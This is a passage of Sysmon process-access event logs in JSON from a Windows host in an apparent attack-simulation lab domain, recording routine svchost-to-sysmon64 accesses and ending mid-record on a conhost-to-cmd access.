2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-108F-5F25-0000-001040B60400}\r\nSourceProcessId: 4612\r\nSourceThreadId: 4632\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 